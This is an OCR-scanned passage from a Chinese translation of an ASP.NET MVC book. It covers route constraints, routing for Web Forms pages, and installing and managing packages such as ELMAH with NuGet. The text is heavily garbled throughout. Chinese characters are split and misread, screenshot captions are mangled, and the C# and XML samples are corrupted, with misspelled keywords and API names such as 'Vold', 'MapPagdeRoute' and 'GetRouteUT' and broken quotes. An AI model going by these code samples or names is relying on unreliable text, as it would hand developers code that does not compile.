串 作 为 约束 传递 进来 时 ，Route 类 就 会 把 该 字符 串 解释 为 正则 表达 式 约束 。 除 此 之 外 ， 我 
们 还 可 以 传递 正则 表达 式 字符 串 之 外 的 约束 。 

路 由 提供 了 一 个 具有 单一 Match 方法 的 IRouteConstraint 接口 。 下 面 给 出 了 该 接口 的 
定义 : 

public interface IRouteConstraint 

bool Match (HttpContextBase httpContext, Route route, string 

parameterName, 


RouteValueDictionary values, RouteDirection routeDirection); 


} 


当 路 由 评估 路 由 约束 时 ， 如 果 约 束 值 实现 了 IRouteConstraint 接口 ,， 那么 这 就 会 导致 路 
由 引擎 调用 路 由 约束 上 的 下 outeConstraintMatch 方法 ， 以 确定 约束 是 否 满 足 给 定 的 请 求 。 

会 为 传 入 URL 以 及 在 生成 URL 时 运行 路 由 约束 。 负 需要 一 个 路 由 约束 来 检查 Match 
方法 的 routeDirection 参数 ， 从 而 根据 调用 时 间 来 应 用 不 同 多 和 辑 。 

路 由 本 号 以 HttpMethodConstraint 类 的 形式 提供 了 一 个 IRouteConstraint 接口 的 实现 。 
这 一 约束 允许 我 们 指定 的 路 由 只 能 匹配 特定 的 HITP 方法 (动词 ) 集 。 

例如 , 如 果 想 定义 一 个 路 由 , 使 其 只 响应 GET 请 求 , 而 不 响应 POST、PUT 和 DELETE 
请 求 ， 那 么 我 们 可 以 这 样 定义 : 


routes.MapRoute("name", “"{controller}", null 
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: new {httpMethod = new HttpMethodConstraint ("GET™")} ); 


注意 ” 自 定义 约束 没有 必要 关联 URL 参数 ， 因 此 可 以 提供 一 个 基于 多 个 
URL 参数 或 一 些 其 他 信息 (本 例 中 的 请 求 头 ) 的 约束 。 


9.6 Web Forms 和 路 由 机 制 


尽管 本 书 的 重点 在 ASPNET MVC， 但 路 由 是 ASPNET 的 一 个 核心 特性 ， 因 此 ， 它 也 
可 以 和 Web Forms 一 起 使 用 。 本 厄 首先 看 一 个 简单 的 场合 一 一 ASPNET 4， 因 为 它 提供 了 
对 路 由 和 Web Forms 的 完整 支持 。 

在 ASPNET 4 中 ， 我 们 可 以 向 Global.asax 文件 中 添加 对 System.Web.Routing 的 引用 ， 
还 能 够 以 几乎 和 ASPNET MVC 应 用 程序 一 样 的 格式 ， 声 明 Web Forms 路 由 : 


Vold Application start(object sender, EventArgs e) 


{ 
ReglisterRoutes (RouteTable.Routes)}); 
} 
private void RegisterRoutes (RouteCollection routes) 
{ 
TOoUtesSs .MapPagdeRoute ( 
"product—search”™, 
"albums/search/{term}", 
"~/AlbumSearch.aspx"); 
} 


Web Forms 路 由 与 MVC 路 由 仅 有 的 区 别 是 最 后 一 个 参数 ， 它 可 以 把 路 由 定 同 到 一 个 
Web Forms 页 面 。 然 后 使 用 Page.RouteData 访问 路 由 参数 值 ， 代 码 如 下 : 
protected vold Page Loadl(object sender, EventArgs e) 


{ 


string term = RouteData.Values|"term"| as string; 


Labell.Text = "Search Results for: ”+ Server.HtmlEncode (term); 
ListViewl .DataSource = GetSearchResults (term); 
ListViewl .DataBind(); 

} 


我 们 也 可 以 在 标记 中 使 用 Route 值 ， 使 用 新 的 <asp:RouteParameter> 对 象 把 段 值 绑 定 到 
数据 库 查 询 或 命令 。 例 如 ， 使 用 前 面 的 路 由 ， 如 果 浏 览 到 /albums/search/beck， 我 们 可 以 通 
过 传递 的 路 由 值 使 用 下 面 的 SQL 命令 来 查询 : 


<asp:SqlDataSource id="SqlDataSourcel™ runat="server" 
Connectionstring="<$%$ Connectionstrings:Northwind $>"™ 
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SelectCommand="SELECT * FROM Albums WHERE Name LIKE (lsearchterm 十 “第 " "> 
<SelectParameters> 

<asp:RouteParameter name="searchterm" RouteKey="term”" /> 
</SelectPparameters> 
</asp:SqlDataSource> 


也 可 通过 使 用 RouteValueExpressionBuilder 写 出 一 个 路 由 参数 ， 这 样 比 使 用 Page.Route- 
Value["key"] 要 优雅 些 。 如 果 想 在 一 个 标签 中 写 出 查询 术语 ， 我 们 可 以 使 用 下 和 面 的 代码 : 


<asp:Label ID="Labell™" runat="server”" Text="<$%$RouteValue:Term$>" /> 


可 在 代码 隐藏 多 辑 方法 中 使 用 Page.GetRouteUrl0 来 生成 传 出 的 URL: 


string UTJL = Page .GetRouteUT ( 
"Product—search", 
new { term = "chai™ 1}); 


相应 的 RouteUrlExpressionBuilder 支持 使 用 路 由 生成 传 出 的 URL: 


<asp:HyperLink ID="HyperLinkl" 
runat="server" 
NavigateUrl="<$%$RouteUrl:SearchTerm=Chai$®>"> 
Search for Chal 
</asp:HyperLink> 


9.7 小 和 
路 由 机 制 非常 类似 于 中 国 的 围棋 游戏 ， 人 简单 易学 但 却 需要 一 生 的 时 间 去 掌握 。 即 使 不 


是 一 生 , 也 至 少 需要 一 些 天 。 路 由 的 概念 虽然 简单 , 但 它 却 可 以 应 用 于 极其 复杂 的 ASPNET 
MVC( 和 Web Forms) 应 用 中 ， 本 章 对 这 些 内 容 都 做 了 详细 介绍 。 
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NuGet 


本 章 主要 内 容 
e NuGet 概述 
e 安装 NuGet 
。 安装 包 
e 创建 包 
。 发 布 包 


对 于 .NET 和 Visual Studio 而 言 ，NuGet 是 一 个 全 新 的 NET 包 管 理 系 统 ， 它 可 以 很 容 
易 地 回应 用 程序 中 添加 、 更 新 和 删除 外 部 库 及 其 依赖 。 此 外 ，NuGet 也 使 得 创建 与 他 人 的 
分 享 包 变 得 容易 。 本 章 介绍 了 NuGet 在 应 用 程序 开发 流程 中 的 基本 用 法 , 并 在 此 基础 之 上 ， 
又 进一步 讲解 了 它 的 一 些 高 级 用 法 。 


= 


10.1 NuGet 概述 


要 尽 可 能 地 尝试 ， 不 要 指望 Microsoft 为 我 们 提供 所 需要 的 每 一 段 代 码 。 在 .NET 平台 
上 进行 开发 的 开发 人 员 多 达 数 百 万 甚至 上 干 万 ， 而 每 一 个 开发 人 员 都 有 其 独特 的 技术 和 吸 
符 解 决 的 问题 。 等 待 Microsoft 去 解决 每 个 开发 人 员 的 每 个 问题 ， 既 形 不 成 规模 ， 也 没有 

然而 ， 值 得 庆 季 的 是 ， 许 多 开发 人 员 都 不 用 再 “上 自 扫 门 前 雪 ”， 他 们 可 以 通过 网 上 发 
布 的 一 些 库 来 解决 他 们 或 他 们 客户 的 问题 。 

面 对 网 上 这 些 有 用 的 库 ， 我 们 面临 三 大 挑战 : 发 现 、 安 装 和 维护 。 也 就 说 ， 开 发 人 员 
如 何 找到 需要 的 库 ? 找到 之 后 ， 如 何在 项 目 中 利用 这 些 库 ? 安装 后 ， 如 何 跟踪 项 目 更 新 ? 
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在 介绍 NuGet 如 何 获取 ELMAH 库 之 前 , 本 节 首 先 快速 浏览 一 下 在 NuGet 出 现 以 前 获取 包 
的 步骤 。ELMAH 代表 错误 日 志 记 录 模 块 (Error Logging Module) 和 处 理 程序 (Handler), 主要 
用 来 记录 和 显示 Web 应 用 程序 中 未 显示 的 异常 信息 。NuGet 团队 非 弟 熟悉 这 些 步 又 ， 因 和 为 
我 们 在 NuGet.org 站 点 上 使 用 了 ELMAH， 这 些 内 容 会 在 第 16 章 进 行 讨 论 。 

在 不 利用 NuGet 的 情况 下 使 用 ELMAH， 可 按 以 下 步骤 操作 ; 

(1) 首先 找到 ELMAH: ELMAH 是 一 个 唯一 的 名 称 ， 因 此 使 用 任何 搜索 引擎 都 可 以 很 
轻松 地 找到 它 。 

(2) 下 载 正确 的 zip 包 : 页 面 上 会 有 多 个 zip 文件 供 选择 下 载 ， 根 据 笔 者 的 个 人 经 验 ， 
选择 正确 文件 下 载 并 不 总 是 容易 的 。 

(3) “解除 阻止 ” 包 : 从 网 上 下 载 的 文件 都 标记 有 它们 来 日 “Web 区 域 "?， 存在 潜在 的 
不 安全 信息 。 该 标记 有 时 称 为 “Web 标记 ”在 解压 软 文件 之 前 ， 解 除 阻止 压 纵 文件 非常 
重要 ， 和 否则 里 面 的 每 个 文件 都 会 有 位 设置 (bit set)， 这 样 就 会 导致 我 们 的 代码 在 一 些 应 用 场 
合 中 不 能 正 第 工作 。 如 果 对 如 何 设 置 Web 标记 感 兴趣 ， 可 参阅 “Windows 附件 管理 器 工作 
方式 说 明 ”，Windows 附件 管理 器 专门 负责 保护 操作 系统 免 受 潜在 的 不 安全 附件 的 威胁 ， 
网 址 为 http://support.microsoft.com/kb/883260。 

(4) 确认 下 载 文件 的 哈 希 值 与 宿主 环境 提供 的 哈 希 值 相符 : 核实 下 载 文 件 的 哈 布 值 是 
侣 与 下 载 页 面 提供 的 哈 布 值 相符 ， 以 确保 下 载 的 文件 没有 被 修改 。 

(5) 把 包 解 缩 讨 到 合适 位 置 : 通常 情况 下 ， 我们 会 解压 到 lip 文件 夹 下 ， 以 便 引 用 这 些 
程序 集 。 开 发 人 员 通 常 不 把 程序 集 添加 到 bin 目录 下 ， 否 则 bin 目录 会 被 添加 到 源 代 但 
控制 。 

(6) 添加 程序 集 引 用 : 在 Visual Studio Project 中 添加 对 程序 集 的 引用 。 

(7) 更 新 web.config: ELMAH 要 求 一 些 配 置 。 通 常情 况 下 , 程序 会 在 web.config 文档 
中 搜索 正确 的 设置 。 

由 于 ELMAH 库 没 有 依赖 库 ， 因 此 采用 以 上 步骤 即 可 将 其 添加 到 Visual Studio 项 
目 中 ! ”如果 诬 加 的 库 拥 有 依赖 库 ， 那 么 每 次 更 新 它 时 ， 我 们 都 再 要 得 找 它 的 每 个 依赖 库 
的 正确 版 本 ， 并 为 找到 的 每 个 依赖 库 版 本 重复 以 上 步骤 。 这 样 一 来 ， 在 每 次 准备 部 晋 应 用 
程序 的 新 版 本 时 ， 都 要 承担 一 系列 痛 否 的 任务 ， 这 也 是 许多 项 目 组 都 长 时 间 地 坚持 依赖 旧 
版 本 包 的 原因 。 

NuGet 可 以 帮助 我 们 消除 这 些 痛 盏 。 它 可 以 目 动 完 成 所 有 这 些 普 遍 而 乏味 的 工作 ， 即 
NuGet 会 上 自动 完成 当前 包 及 其 依赖 包 的 安装 和 更 新 。 这 样 几乎 消除 了 在 项 目 资源 树 中 添加 
第 三 方 开源 库 的 一 切 困 难 。 当 然 ， 是 否 能 够 合适 地 使 用 这 些 第 三 方 开源 库 ， 仍 取决 于 我 
们 目 己 。 


10.2 NuGet 安装 


本 节 通 过 介绍 如 何 使 用 NuGet 安装 ELMAH 来 讲解 NuGet 如 何 消 除 这 些 痛苦 。 相 对 于 
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手动 操作 ，NuGet 会 使 操作 步骤 大 大 减少 。 下 面 首先 介绍 第 一 步 ， 也 是 仅 有 的 一 次 性 步骤 : 
安装 NuGet。 

如 果 已 经 安装 了 ASPNET MVC 4 或 者 Visual Studio 2012, 那么 NuGet 也 已 成 功 安装 。 
如 条 仍 使 用 Visual Studio 2010 并 且 没 有 安装 NuGet， 那 么 我 们 可 以 通过 Visual Studio 
Extension Manasger 实现 NuGet 的 轻松 安装 ， 可 按照 如 下 步骤 操作 : 

(1) 选择 Tools | Extension Manager 菜单 项 ， 如 图 10-1 所 示 。 打 开 用 来 安装 Visual Studio 
扩展 的 Extension Manager 对 话 框 。 


Tools Architecture Test ReSharper Analyze Window 
@ CheckAccessibility... 


rt est Kun 


i 
SQL Server Compact Toolbox 
Attach to Process.,., CtrieAlt*P 


Connect to Database,,. 


Connect to Server.,.. 


ST 


Code Snippets Manager.., Ctri+k, Ctri+B 
Choose Toolbox tems... 

Add-in Manager,。 

Library Package Manager b 
Macros b 


Extension Manager... 


© 区 


Install Web Components 

Create GUID 

Error Lookup 

ATL/MFC Trace Tool 

Spy++ 

WCF Service Configuration Editor 
External Tools.., 

Import and Export Settings... 
Customize,,., 


OQptions,., 


图 10-1 


(2) Extension Manager 对 话 框 默认 列 出 了 已 安装 的 包 , 单 击 对 话 框 左 侧 的 联机 库 (Online 
Gallery) 选 项 卡 ， 如 图 10-2 所 示 。 

(3) 在 所 写本 章 时 ，NuGet 是 联机 库 中 最 流行 的 扩展 ， 因 此 ， 对 话 框 在 联机 包 中 把 它 
放 在 了 首位 。 我 们 也 可 以 通过 在 右上 角 的 搜索 栏 中 输入 NuGet 来 查找 它 。 无 论 采 用 哪 种 方 
式 ， 只 要 找到 NuGet， 单 击 Download 按钮 ， 下 载 完成 后 ， 按 照 说 明 进 行 安 装 。 

如 果 已 经 成 功 安装 了 NuGet， 可 单 击 Updates 选项 卡 ， 看 是 否 有 可 供 下 载 安装 的 新 版 
本 。NuGet 团队 计划 每 月 发 布 一 个 小 版 本 更 新 ， 所 以 截止 到 我 们 阅读 本 文 时 ， 可 能 就 有 一 
些 新 版 本 发 布 。 
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Extenaen Manager 
| Installed Extensions 
| Online Gallery 

上 

Contreb 


Templates 
Tools 


Updates 


Sort by: | Highest Ranked "| 


Fly 


NuGet Package Manager 
A collection of tools to asutomate the process of 
downloading, installing, upgrading, configuring, amd ra- 


VS5Commands for Visual Studio 2010 
Code Visualezatieon (Cs VB Ces, Mral Marml C5 ASPL 


Razor Jevaseript), Locate In Solution, Copy/Paste Reference... 


AnkKh3VN - Subversion Support / 3CC Provider 
AnkhSVN open sourece (iree) Subverson Sourcet ontrol 
Provider, 


| Proeductivity Pewer Toels 


吧 


A sat of etenaions te Visual 生生 站 本 Professonal (gnd sbove) 
which improves developer produetivity, 


Team Foundatien Server Power Tools Decemb... 
Peover Tools are a set of enhvancernvents toobk and command: 
line utilites that inerease productrty of Team Foundaton 5... 


VS10x Coede Map v2 
Pomverful Visvuasl Studie 2012 arnd B10 code editor visualizer 
(CC 到 and VE). 


Web Standards Update for Microsoft Visual St... 
Adds CS gueecorn and ucdites the HTIMLS intellsense ard 
1 234 5 kh 


10.3 以 包 的 形式 添加 库 


EE ie Clben 


Created by: Mereroft Cerperstien 


Versiom 20.30619919 
Deownloads: 2023500 

Ratiry: 7 Votes) 
Mere niermatan 


Report Extengen te Micreseft 


安装 NuGet 后 ， 就 可 以 轻松 快速 地 向 项 目 中 添加 库 ， 如 ELMAH。 

与 NuGet 交互 有 两 种 方式 : Manage NuGet Packages 对 话 枉 和 Package Manager Console 
控制 台 。 这 里 首先 介绍 对 话 框 ， 之 后 再 介绍 控制 台 。 可 通过 右 击 Solution Explorer 中 的 
References 节点 来 打开 项 目的 Add Library Package Reference 对 话 杠 ， 如 图 10-3 所 示 。 除 此 
之 外 ， 我 们 还 可 以 通过 右 击 项 目 名 称 来 打开 该 对 话 框 。 


solution Explorer 


we 


#7) Solution 'MvcApplication' (1 project) 


| 


国 MvcApplication 


3 Properties 

-il References 

Lai Add Reference,,, 

a | 

pa | Add Service Reference... 
Ba 1 首 Manage 凡 ucet Packages.., 


癌 Models 

L 司 3Scnmpts 

上 Views 

| favicon.ico 

孝 | Global.asax 

i packages.config 
i Web.config 


10-3 


Manage NuGet Packages 对 话 框 看 起 来 类 似 于 Extension Manager 对 话 杠 ， 这 给 一 些 人 
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市 来 了 困惑 ， 其 实 二 者 的 区 别 的 是 非常 清楚 的 。Visual Studio Extension Manager 对 话 框 主 
要 用 来 安装 增强 Visual Studio 的 扩展 。 这 些 扩展 不 会 作为 我 们 应 用 程序 的 一 部 分 进行 部 署 。 
与 此 相反 ，NuGet 是 用 来 安装 扩展 我 们 应 用 程序 的 包 ， 并 且 这 些 扩 展 包 包 含 在 程序 内 。 大 
多 数 情况 下 ， 这 些 包 是 作为 程序 的 一 部 分 部 普 的 。 

此 外 ，Manage NuGet Packages 对 话 框 与 Extension Manager 的 另 一 点 不 同 是 ，Manage 
NuGet Packages 对 话 框 默认 显示 上 次 关闭 时 显示 的 节点 。 我 们 通过 单 击 左 侧 窗 格 中 的 
Online 节点 ， 可 以 查看 NuGet 源 (feed) 中 可 下 载 安 装 的 包 ， 如 图 10-4 所 示 。 


MveApplcation =- Mansge NuGet Packages 


SableOny _v)Sorby[MostDownlosds __»|| ses 


Installed packadqes 
Online 


Nubet official package source 


packages 
Updates 


Recent pae kades 


Esch package is licensed to you by ts 
Owner. Microsoft is not responsible 
for, ner does Rt grant any licenses te, 
trd-party packages. 


10.3.1 查找 包 


Entity Framework is 


Nerosoft's recommend.., 


二 


jQuery 
“® jQuery 5 a fast and concise Javadenipt 


Install 


Library that simplifies HTML docurment tr.., 


WebActivator 
A NubGet package that alheowvs oathver 


packages to erecute some startup code L... 


jQuery Validation 
AjQuery plugin that makes simple 
chentsde form valdation trral, 


Json.NET 
Json.NET 5 a popular high-performanece 
JSON framevwork for .NET 


jQuery UI (Combined Library) 
The full jQuery Ul library as a single 
combined file. Ineludes the base theme, 


1 234 5 kh 


如 果 不 嫌 肛 类 ， 可 使 用 对 话 框 底 部 的 分 页 链接 来 逐 
页 得 找 包 列表 ， 直 到 找到 想 要 的 包 ， 但 是 最 快捷 的 方式 


是 使 用 右上 角 的 搜索 栏 。 


当选 择 一 个 包 时 ， 对 话 框 右 侧 的 窗 格 就 会 显示 该 包 的 
相关 信息 。 图 10-5 展示 了 SignalR 包 的 信息 窗 格 。 
信息 窗 格 中 提供 了 以 下 信息 : 


。 创建 者 : 原始 库 的 作者 列表 。 在 撰写 本 文 时 ， 该 窗 
格 没有 列 出 包 本 身 的 作者 , 在 某 些 情况 下 , 包 作者 


可 能 不 同 于 库 的 作者 。 


Created by: Microsoft 
We: EntityFrameweort 
Version 4.3.1 

Last Updated; 5/15/2012 
Downloads: 441197 


= VIE LiCerise TGS 


propect Infermatron 

Repor Abuse 

Description 

Entity Frameveork is Microsoft’s 
recommended dts access technology for 
new applicatiens. 


Dependencies: 


Ne Dependencies 


| 
ms 了 


= signan x| 
| ec 一 一 用 
Created by: David Fowler Damian 
Edwards 
Id: SignalR 
Version: 0.5.0 
Last Updated: 3/9/2012 
Downloads: 31683 
View License |Terms 
Project Information 
Report Abuse 
Description: 
A clhvent and server side library for .NET that 
provides messaging and an abstraction 
GVEer a persistent connection, 


Dependencies: 
SignalR,.Hosting.AspNet (2 0.5.0) 
wgnalR.Js (2 0.3.0) 


Each ttem obove moy hove sub- 
dependencies subject to odditional license 
Ggreements, 
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e Id: 包 的 标识 。 当 使 用 Package Manager Console 安装 包 时 ， 可 以 使 用 这 个 id 来 标 
识 包 。 

e 版 本 : 包 的 版 本 写 。 通 沼 与 包含 的 库 的 版 本 号 一 怪 ， 但 未 必 如 此 。 

。 下 载 : 库 (gallery) 被 下 载 的 次 数 。 

e 许可 条 球 : 单 击 该 链接 可 查看 包 的 许可 条 球 。 

e 项 目 信息 : 通过 该 链接 可 以 导航 到 包 的 项 目 页 面 。 

e 举报 : 使 用 该 链接 可 以 举报 受 损 或 恶意 的 包 。 

e 描述 : 包 的 作者 对 包 的 简短 说 明 ， 这 是 一 个 了 解 包 的 极 好 地 方 。 

e。 依赖 项 : 该 包 所 依赖 的 包 的 列表 。 

正如 在 图 10-5 中 看 到 的 ，SignalR 包 依 赖 于 其 他 两 个 包 : SignalR.Hosting.AspNet 和 
SignalR.Js。 显 示 的 这 些 信息 由 相应 包 的 NuSpec 文件 控制 ， 本 章 后 面 会 对 该 文件 进行 详细 
介绍 。 


10.3.2 ”安装 包 


要 安装 ELMAH 包 ， 需 执行 以 下 两 个 操作 : 

(1) 在 搜索 框 中 输入 ELMAH。 

(2) 找到 想 要 的 包 ， 单 击 Install 按钮 ， 进 行 安装 。 安 装 程序 在 癌 项 目 中 安装 ELMAH 
包 之 前 ， 会 下 载 ELMAH 及 其 所 有 的 依赖 包 。 


一 些 情况 下 ,系统 会 提示 我 们 接受 包 的 许可 条 款 , 同样 ， 它 的 一 些 依赖 包 
可 能 也 要 求 接受 许可 条 款 。 图 10-6 展示 了 当 试 图 安装 EntityFramework. 
SqlServerCompact 包 时 的 画面 。 要 求 接受 许可 条 款 ， 它 们 是 由 包 的 作者 在 包 中 
设置 的 。 


| License Acceptance 


| Thefollowing packagels) require a click-to-accept license: 
Microsoft.SqlServer,Compact (Author: Microsoft) 

OO Vew License Terms 

Entityframework.SqlServerCompact (Author Microsoft) 


View License Terrs 


| By clicking 了 Accept” you agree to the license terms for the package 
(5s) listed above, H you do not agree to the license terms, click "1 
Declime， 


| | Decline | | lAccept | 
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当 NuGet 安装 ELMAH 时 ， 我 们 的 项 目 会 有 一 些 改变 。 当 第 一 个 包 安 装 到 项 目 时 ， 我 
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们 的 项 目 中 会 添加 一 个 名 为 packages.config 的 文件 , 如 图 10-7 所 示 。 由 于 ASPNET MVC 4 
项 目 模板 本 身 会 包含 一 些 NuGet 包 , 因此 packages.config 文件 会 出 现在 新 创建 的 ASPNET 
MVC 4 项目 中 。 同 时 ， 该 文件 保存 有 项 目 中 已 安装 包 的 列表 。 
Solution Explorer 
FF 证 Jr 了 慎 ， 
本 Solution ‘MveApplication5' (1 project) 
a ID MvcApplication5 


= Propertes 
= References 


D1 App_Data 
DD App_Start 
DD Content 


[I Controllers 

I Images 

器 Models 

a senpts 

a Views 

uN favicon.ico 

苛 | Global.asax 

3 packages.config 
By Web,config 


图 10-7 


packages.config 文件 的 格式 非常 徐 单 。 下 面 是 ELMAH 1.2.2 版 本 的 包 在 安装 时 所 添加 
文件 的 内 容 : 


<2xXm] version="] .0" encoding="utf--8"?> 


<packages> 
<package id="elmah™" version="1.2.2"™ /> 
</packages> 


从 上 和 面 的 代码 可 以 看 出 ,现在 我 们 有 一 个 对 Elmah.dll 程序 集 的 引用 ， 如 图 10-8 所 示 。 


Solution Explorer Ox 
Ea JJ 必 、 
a 1 References 
-器 Antir3.Runtime 
:DD Elmah 
-器 EntityFramework 
: Microsoft.CSharp 


: Microsoft.Web,Infrastructure 

-器 Newtonsoft.Json 

:器 System 
-System.ComponentModel.DataAnnotations 
-器 System,Configuration 


图 10-8 
程序 集 从 哪里 引用 的 呢 ? 为 回答 这 个 问题 ， 我 们 需要 查看 在 包 安 装 完 成 后 ， 解 决 方案 
中 都 添加 了 哪些 文件 。 当 第 一 个 包 安 装 到 项 目 中 时 ， 安 装 程序 会 在 解决 方案 文件 所 在 的 有 目 
录 下 创建 一 个 名 为 packages 的 文件 来 ， 如 图 10-9 所 示 。 
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Name Date modified Type 
MvecApplication5 8/16/20124:271 PM Filefolder 
packages B/16/2012 4:27 PM File folder 

四 MvcApplicationS.sIn 8/16/2012 4:19 PM Microsoft Visual S$... 
MvycApplication3.suo 8/16/2012 4:20 PM Visual Studio Solu,... 


图 ”10-9 


每 个 安装 的 包 都 要 在 packages 文件 夹 中 创建 一 个 与 之 对 应 的 子 文件 夹 。 图 10-10 展示 
了 一 个 包含 多 个 安装 包 的 packages 文件 夹 。 


MivcAPplicaticnas Name Date modified Type 
MvcApplicationS Es | 
content /16/2012 4:21 PM File folder 
packages | i 
elmahl22.nupkg 8/16/20124:27 PM NuGet packagefile 
elmah.1.2.2 Fa Ep 
| Readme.bdt /62012 4:21 PM [ext Docurment 
tontent 
elmah.corelibrary.l 2.2 
lib 


EntityFramework.2.0.0-rc 


10-10 


注意 这 些 文件 夹 名 称 中 都 含有 包 的 版 本 号 ， 因 为 packages 文件 夹 包含 了 为 指定 解决 方 
案 安 装 的 所 有 包 ， 而 对 于 安装 有 同一 个 包 的 不 同 版 本 的 两 个 项 目 来 说 ， 它 们 很 有 可 能 就 在 
同一 解决 方案 中 。 

图 10-10 也 展示 了 ELMAH 包 所 对 应 文件 夹 中 的 内 容 , 其 中 包含 包 的 内 容 以 及 以 .nupkg 
文件 格式 存储 的 原始 包 。 

lib 文件 夹 下 包含 ELMAH 程序 集 ， 因 此 , 它 是 ELMAH 程序 集 引 用 的 位 置 。 这 就 是 我 
们 想 把 packages 文件 夹 放 入 源 代码 管理 库 的 原因 。 这样 就 可 以 实现 在 同一 代码 上 工作 的 人 
从 版 本 控制 获取 最 新 版 本 代码 ， 以 使 他 们 在 同一 代码 状态 。 并 非 每 个 人 都 喜欢 在 版 本 控制 
库 中 包含 packages 文件 夹 。 因 此， 后 面 的 “修复 包 ” 小 节 会 介绍 NuGet 文 持 的 另 一 个 工作 
流程 ， 在 这 工作 流程 中 ， 我 们 不 必 同 版 本 库 中 提交 包 ，。 

包 修 复 常 用 于 分 布 版 本 控制 系统 中 ， 比 如 Git 和 Mercurial。 

content 文件 夹 包含 直接 复制 到 项 目 根 目录 下 的 文件 。 当 被 复制 到 项 目 中 时 ， 我们 需要 
维护 content 文件 夹 的 目录 结构 。 该 文件 夹 可 能 也 包含 源 代 码 和 配置 文件 的 转换 ， 这 一 点 后 
面 会 进一步 讲解 。 在 ELMAH 的 例子 中 , 会 有 一 个 web.config.transform 文件 ， 它 使 用 ELMAH 
要 求 的 设置 更 新 web.config 文件 ， 如 下 面 的 代码 所 示 : 

<2xm] version="] .0" encoding="utf-8"?> 

<Configuration> 

<ConfigSections> 
<SectionGroup name="elmah"> 
<section name="security" requlilrePermisslion="false" 
type="Elmah.SecuritySectionHandler, Elmah" /> 
<section name="errorLog" requirePermission="false" 


type="Elmah .ErrorLogSectionHandler, Elmah" /> 
<Section name="errorMalil" requirePermission="false" 
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type="Elmah.ErrorMailSectionHandler, Elmah" /> 
<section name="errorFilter" requirePermission="false" 
type="Elmah.ErrorFilterSectionHandler, Elmah" /> 
</sectionGroup> 
</configSections> 


</confiqguration> 

有 些 包 还 包含 一 个 tools 文件 夹 ， 其 中 可 能 包含 PowerShell 脚本 ， 本 章 后 面 会 详细 介 
绍 这 些 内 容 。 

完成 所 有 这 些 设置 后 ， 现 在 可 以 上 自由 地 利用 项 目 中 引用 的 外 部 库 ， 享 受 完整 的 智能 感 
知 功 能 和 编程 访问 库 的 好 处 。 在 ELMAH 例子 中 ， 我 们 不 需要 编写 额外 的 代码 。 要 想 查 看 
ELMAH 的 工作 状况 ， 运 行 应 用 程序 并 访问 ~/elmah.axd 即 可 ， 运 行 效果 如 图 10-11 所 示 。 


| Errer leog for / on HAACKI] 
€ 3 CC 口 Ilocalhost22399/elmah.axc 


Error 0g for /1 on HAACKITUDE 


Date Tirme 


HAACKITUDE a0a Http The controller for path Bi6/2012 :50 PM 
| Telmaheuoeuth' was not found 
Br dees not implement 


ICceontroller, Detalls 


HAACKITUDE 0 NotImplemented The method or operation is B/16/2012 
nat implemented. Datalls. 


:50 PM 


| Powered by ELMAH, MA ,2.14706.955. Copyright (e) 2004, Alif Aziz. All rights reserved, Licensed 
| under Apach 0. Server date tis Thursday, 16 August 2012. Server me Iis 16:51:29, 


lL icenaa NN 芝 ， 
| Bl dates a times i are in the Paciie Davlight Time zone. This log is provided by the In: 
| Memaory Errer Log 


图 10-11 


注意 正如 在 上 面 所 看 到 的 ,一 旦 成 功 安装 NuGet, 向 项 目 中 添加 ELMAH 
就 会 变 得 非常 容易 ， 只 需 在 NuGet 对 话 框 中 找到 它 ， 然 后 单 击 Install 按钮 即 
可 。NuGet 可 以 自动 完成 所 有 那些 将 库 添 加 到 项 目 中 的 枯燥 的 国定 步骤 ， 以 使 
程序 可 以 立即 引用 它 。 


10.3.3 ”更 新 包 

假设 我 们 在 项 目 中 已 经 安装 了 十 几 个 包 ， 现 在 想 把 安装 的 每 一 个 包 更 新 到 最 新 版 本 。 
在 没有 安装 NuGet 以 前 ， 这 是 一 个 非 疝 耗 时 的 任务 ， 我 们 需要 登录 到 每 一 个 库 的 首页 ， 碍 
找 与 该 库 对 应 的 最 新 版 本 。 

在 安装 了 NuGet 后 ， 我 们 只 需 单 击 对 话 框 左 侧 窗 格 中 的 Updates 节点 ， 然 后 在 中 间 窗 
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格 中 将 显示 当前 项 目 中 有 较 新 版 本 的 包 的 列表 , 单 击 紧 挨 着 每 个 包 的 Update 按钮 , 将 该 包 
升级 全 最 新 版 本 。 这 也 会 更 新 包 的 所 有 依赖 ， 以 确保 只 安装 依赖 的 兼容 版 本 。 


10.3.4 最近 包 


最 近 包 (Recent Packages) 广 点 展示 了 最 近 直 接 安 装 过 的 25 个 包 。 因 为 与 这 些 包 有 依赖 
而 安 闭 的 包 未 显示 在 这 个 列表 中 。 当 把 一 个 包 安 装 到 多 个 项 目 或 者 经 凋 性 地 使 用 同一 个 包 
时 ， 这 个 功能 非常 有 用 。 

如 果 需 要 更 加 清晰 地 列 出 最 近 使 用 过 的 包 ， 可 在 Package Manager 设置 对 话 框 的 
General 节点 中 单 击 “Clear Recent Packages” 按 钮 。 


10.3.5 ” 包 恢 复 


正如 前 面 提 到 的 ，NuGet 默认 的 工作 流程 是 把 包 文 件 夹 提 交 到 版 本 控制 。 这 样 做 的 一 
个 好 处 是 可 从 版 本 控制 检索 解决 方案 ， 以 确保 构建 解决 方案 的 每 个 包 痢 能 够 安装 ， 而 且 这 
些 包 还 不 需要 从 其 他 位 置 检索 。 

然而 ， 这 个 方法 有 一 些 不 足 之 处 。Packages 文件 夹 不 是 Visual Studio 解决 方案 的 一 部 
分 ， 因 此 ， 通 过 Visual Studio 集成 管理 版 本 控制 的 开发 人 员 再 要 进行 一 个 额外 的 步骤 以 确 
保 Packages 文件 夹 能 够 提交 。 如 果 碰 巧 使 用 TFS(Team Foundation System 进行 源码 控制 ， 
NuGet 会 自动 提交 Packages 文件 夹 。 

使 用 分 布 版 本 控制 系统 (DVCS)( 比 如 Git 或 MercuriaD) 的 开发 人 员 还 会 面临 另 一 个 问 
题 。 通 第 情况 下 , DVCS 不 擅长 处 理 二 进 制 文 件 。 如 果 项 目 中 大 量 的 包 都 有 很 大 改变 , DVCS 
库 会 变 得 很 大 。 在 这 种 情况 下 ， 我 们 就 不 需要 把 Packages 文件 夹 提 交 到 版 本 控制 了 。 

NuGet 1.6 引入 了 包 修 复 功 能 来 处 理 这 些 问题 , 这样 就 支持 一 个 新 的 工作 流程 , 我 们 就 
不 需要 把 Packages 文件 夹 提 交 到 源 公 控制 了 。 

为 使 用 包 修 复 功 能 , 在 Visual Studio 中 的 解决 方案 上 右 击 , 选择 Enable NuGet Package 
